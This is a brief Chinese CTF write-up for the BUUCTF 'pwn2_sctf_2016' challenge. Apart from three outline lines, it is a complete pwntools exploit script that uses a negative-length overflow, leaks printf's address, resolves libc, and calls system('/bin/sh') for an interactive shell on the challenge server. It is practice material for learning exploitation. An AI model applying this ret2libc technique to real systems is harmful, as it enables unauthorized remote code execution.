BUUCTF-pwn2_sctf_2016(18/100)
一、查保护
二、代码审计
三、过程
首先溢出,这里使用负数可以溢出
然后利用printf泄露
然后shell
四、脚本
from LibcSearcher import LibcSearcher
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
sl=lambda x:io.sendline(x)
rv=lambda x:io.recv(x)
#io = process('./')
io=remote('node3.buuoj.cn',29189)
elf=ELF('./pwn2_sctf_2016')
sla('?','-1')
payload='a'*0x2c+'b'*4+p32(elf.plt["printf"])+p32(0x080485B8)+p32(0x080486F8)+p32(elf.got["printf"])
sla('data!\n',payload)
rl()
ru(': ')
printf=u32(rv(4))
print(printf)
libc = LibcSearcher('printf', printf)
libcbase = printf - libc.dump('printf')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
sla('?','-1')
payloadx='a'*0x2c+'b'*4+p32(system_addr) + p32(0x080485B8) + p32(binsh_addr)
sla('data!\n',payloadx)
io.interactive()
五、总结
注意细节!!!(32)
浙公网安备 33010602011771号